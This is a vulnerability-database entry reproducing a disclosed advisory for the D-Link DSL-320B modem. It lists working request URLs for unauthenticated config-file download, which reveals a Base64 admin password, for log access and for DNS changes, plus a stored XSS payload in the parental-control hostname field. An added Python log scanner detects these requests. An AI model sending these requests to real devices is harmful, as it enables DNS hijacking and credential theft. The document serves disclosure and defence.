ID

VAR-E-201305-0424


EDB ID

25251


TITLE

D-Link DSL-320B - Multiple Vulnerabilities - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 25251

DESCRIPTION

D-Link DSL-320B - Multiple Vulnerabilities. CVE-93020, CVE-93019, CVE-93018, CVE-93014, CVE-93013. webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 25251

AFFECTED PRODUCTS

vendor: d link, model: dsl-320b, scope: -, version: -

Trust: 1.6

sources: EXPLOIT-DB: 25251 // EDBNET: 47275

EXPLOIT

Device: DSL-320B

Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010

Vendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem

============ Vulnerability Overview: ============

* Access to the Config file without authentication => full authentication bypass possible! :) (1)

192.168.178.111/config.bin

===<snip>====
<sysUserName value="admin"/>
<zipb enable="1"/>
<dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/>
<sysPassword value="dGVzdA=="/>
===<snip>====

=> sysPassword is Base64 encoded

* Access to the logfile without authentication: (1)
192.168.178.111/status/status_log.sys

* Change the DNS Settings without authentication: (1)
http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2

* Stored XSS within parental control (2):

=> Parameter: set/bwlist/entry:1/hostname

Request:
http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1

Again you are able to place this XSS without authentication. :)

* Login Credentials in HTTP GET are not a good idea => use HTTP POST! (3)
http://192.168.178.111/login.xgi?user=admin&pass=admin1

* Credentials in HTTP GET via password change request are not a good idea => use HTTP POST! (3)
http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1
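
The endpoints listed above give a defender something concrete to watch for in the modem's HTTP access log or on an upstream proxy. The following classifier is an added example, not part of the advisory: it flags requests to the two unauthenticated read endpoints, the unauthenticated DNS change, a parental-control hostname carrying markup, and credentials passed in GET query strings; the log lines are constructed, and the finding labels are my own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format (not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [06/May/2013:10:00:01 +0200] "GET /config.bin HTTP/1.1" 200 8123
10.0.0.5 - - [06/May/2013:10:00:02 +0200] "GET /status/status_log.sys HTTP/1.1" 200 2048
10.0.0.5 - - [06/May/2013:10:00:03 +0200] "GET /advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1 HTTP/1.1" 200 512
10.0.0.5 - - [06/May/2013:10:00:04 +0200] "GET /home/home_parent.xgi?&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/apply=1 HTTP/1.1" 200 512
10.0.0.9 - - [06/May/2013:10:00:05 +0200] "GET /login.xgi?user=admin&pass=admin1 HTTP/1.1" 200 300
10.0.0.9 - - [06/May/2013:10:00:06 +0200] "GET /home/home_parent.xgi?&set/bwlist/entry:1/hostname=laptop&set/bwlist/apply=1 HTTP/1.1" 200 512
10.0.0.9 - - [06/May/2013:10:00:07 +0200] "GET /index.html HTTP/1.1" 200 1024
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/')
# Characters that never belong in a hostname field: quotes, angle brackets, event handlers.
MARKUP_RE = re.compile(r'[<>"\']|\bon\w+=', re.IGNORECASE)
# Endpoints the advisory lists as readable without authentication (labels are constructed).
UNAUTH_READ = {"/config.bin": "config-file-read", "/status/status_log.sys": "log-file-read"}

def classify(line):
    """Return a finding label for one access-log line, or None if nothing matches."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # parse_qsl splits on '&' and the first '=' only, so slash-containing keys such as
    # 'set/bwlist/entry:1/hostname' survive intact and the leading '&' yields no pair.
    params = dict(parse_qsl(url.query, keep_blank_values=True))
    if url.path in UNAUTH_READ:
        return UNAUTH_READ[url.path]
    if url.path.endswith("/adv_dns.xgi") and any(k.startswith("SET/dns/") for k in params):
        return "dns-settings-change"
    if url.path.endswith("/home_parent.xgi"):
        # Any parental-control entry whose hostname carries markup is a stored-XSS attempt.
        if any(k.endswith("/hostname") and MARKUP_RE.search(v) for k, v in params.items()):
            return "stored-xss-attempt"
    if url.path.endswith("/login.xgi") and "pass" in params:
        return "credentials-in-get"
    if url.path.endswith("/tools_admin.xgi") and "set/sys/account/user/password" in params:
        return "credentials-in-get"
    return None

def scan(log_text):
    """Return (label, path) for every flagged line, in log order."""
    findings = []
    for line in log_text.splitlines():
        label = classify(line)
        if label:
            findings.append((label, urlsplit(REQUEST_RE.search(line).group("target")).path))
    return findings
```

The benign hostname `laptop` and the plain `/index.html` request pass through unflagged, while the credentials-in-GET hit also shows why such URLs should be scrubbed before logs are shared.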

============ Solution ============

Update to firmware version 1.25:

(1) - fixed
(2) - not fixed but authentication needed
(3) - not fixed

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============

17.03.2012 - discovered vulnerabilities
17.03.2013 - informed vendor about the vulnerabilities
25.04.2013 - tested beta version from vendor
30.04.2013 - vendor releases patch
06.05.2013 - public disclosure

===================== Advisory end =====================

Trust: 1.0

sources: EXPLOIT-DB: 25251

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 25251

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 25251

TYPE

Multiple Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 25251 // EDBNET: 47275

CREDITS

m-1-k-3

Trust: 0.6

sources: EXPLOIT-DB: 25251

EXTERNAL IDS

db: EXPLOIT-DB id: 25251

Trust: 1.6

db: EDBNET id: 47275

Trust: 0.6

sources: EXPLOIT-DB: 25251 // EDBNET: 47275

REFERENCES

url:http://www.s3cur1ty.de/advisories

Trust: 1.0

url:https://www.exploit-db.com/exploits/25251/

Trust: 0.6

sources: EXPLOIT-DB: 25251 // EDBNET: 47275

SOURCES

db: EXPLOIT-DB id: 25251
db: EDBNET id: 47275

LAST UPDATE DATE

2022-07-27T10:03:16.765000+00:00


SOURCES RELEASE DATE

db: EXPLOIT-DB id: 25251 date: 2013-05-06T00:00:00
db: EDBNET id: 47275 date: 2013-05-06T00:00:00